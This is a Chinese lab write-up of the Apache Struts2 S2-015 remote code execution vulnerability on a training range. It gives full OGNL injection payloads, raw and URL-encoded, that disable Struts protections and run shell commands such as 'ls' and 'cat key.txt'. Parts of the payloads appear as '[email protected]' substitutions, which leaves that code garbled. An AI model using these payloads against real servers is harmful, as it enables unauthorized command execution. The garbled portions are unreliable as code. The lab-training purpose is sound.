08#墨者靶場-Apache Struts2遠程代碼執行漏洞(S2-015)復現

原創 shy014 2020-02-23 21:05

                                                   墨者學習

                                                  By/shy014

背景介紹

某日,安全工程師"墨者"對一單位業務系統進行授權掃描,在掃描過程中,發現了某個業務系統使用Apache Struts2框架。並且該版本存在高危漏洞,不知道運維人員是否修補了漏洞。

實訓目標

1、瞭解Apache Struts2框架;

2、瞭解Apache Struts2遠程代碼執行漏洞(S2-015);

3、瞭解Apache Struts2遠程代碼執行漏洞形成原理;

4、掌握Apache Struts2遠程代碼執行漏洞利用方法;

解題方向

驗證Apache Struts2遠程代碼執行漏洞(S2-015)。

由於通配符匹配機制引入的漏洞或OGNL表達式的雙重評估允許遠程命令執行。

  1. 在墨者學院找到該靶場並點擊啓動靶場

  1. 點擊訪問,進入靶場環境,輸入/${1+1}.action。發現表達式被執行,證明存在漏洞。

  1. 查看文件

Payload:${#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#m=#_memberAccess.getClass().getDeclaredField(‘allowStaticMethodAccess’),#m.setAccessible(true),#m.set(#_memberAccess,true),#[email protected]@toString(@java.lang.Runtime@getRuntime().exec(‘ls’).getInputStream()),#q}.action

需要經過url編碼:

/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27ls%27%29.getInputStream%28%29%29%2C%23q%7D.action

4.執行cat key.txt,獲取key

Payload:/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27cat%20key.txt%27%29.getInputStream%28%29%29%2C%23q%7D.action

二.使用struts2漏洞檢測工具

1.使用工具進行檢測,發現存在漏洞

2.執行ls命令

  1. 讀取key.txt值

  1. 提交key

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Sqlilabs lesson1-6

注入步驟 判斷注入點 使用且或非來判斷,即and、or、xor 一般使用and來進行判斷,以第一關爲例: http://172.16.54.161/sqli/Less-1/?id=1’ and ‘1’=‘1 返回正確 http:/

qq_43558415 2020-07-02 23:19:39

hackthebox註冊教程

官方網址:https://www.hackthebox.eu/ hackthebox是一個靶場,聽說和vulnhub很像,最近迷上了做靶場,於是就像去hackthebox看看,發現還是註冊,而且註冊好像還沒有那麼簡單 在首頁的最下面有個j

shy014 2020-06-17 04:08:42

我愛做靶機之DC-3

下載地址:https://www.vulnhub.com/entry/dc-3,312/  主機發現 掃描端口,發現只開啓了80端口,通過-A參數,還可以看到該網站的CMS爲Joomla  訪問80端口 目錄掃描,發現網站後臺

shy014 2020-06-17 04:08:31

我愛做靶機之DC-4

下載地址:https://www.vulnhub.com/entry/dc-4,313/ 主機發現 arp -scan -l nmap -sP 端口掃描 掃描目錄 嘗試了弱口令和萬能密碼,也沒有什麼用 開始爆破 登錄成功,看樣

shy014 2020-06-17 04:08:31

我愛做靶機之DC-2

下載地址:https://www.vulnhub.com/entry/dc-2,311/ 主機發現 端口掃描 nmap -v -sV -A -p- 192.168.44.147 訪問80端口失敗,顯示無法訪問該網站 猜測是沒有做域

shy014 2020-06-08 17:10:46

我愛做靶機之DC-1

下載地址:https://www.vulnhub.com/entry/dc-1-1,292/ 主機發現 nmap -sn 192.168.44.0/24 (因爲DC靶機使用的是NAT模式,而我得NAT模式是192.168.44.0網段,

shy014 2020-06-08 17:10:46

OWASP Security Shepherd靶場實戰

風月长情 2020-05-08 19:01:56

搭建sql注入靶場

闲适的格调 2020-05-08 13:19:52

09#墨者靶場-Apache Struts2遠程代碼執行漏洞(S2-016)復現

shy014 2020-02-23 21:05:05

墨者靶場-SQL過濾字符後手工注入漏洞測試(第1題)

shy014 2020-02-23 21:05:05

07#墨者靶場-phpMyAdmin後臺文件包含分析溯源

shy014 2020-02-23 21:05:05

04#墨者靶場-SQL手工注入漏洞測試(Access數據庫)

shy014 2020-02-23 21:05:05

01#墨者靶場-X-Forwarded-For注入漏洞實戰

shy014 2020-02-23 21:05:05

03#墨者靶場-SQL手工注入漏洞測試(MySQL數據庫)

shy014 2020-02-23 21:05:05

DVWA靶場-常見漏洞原理以及防禦

R1ght0us 2020-02-21 05:25:15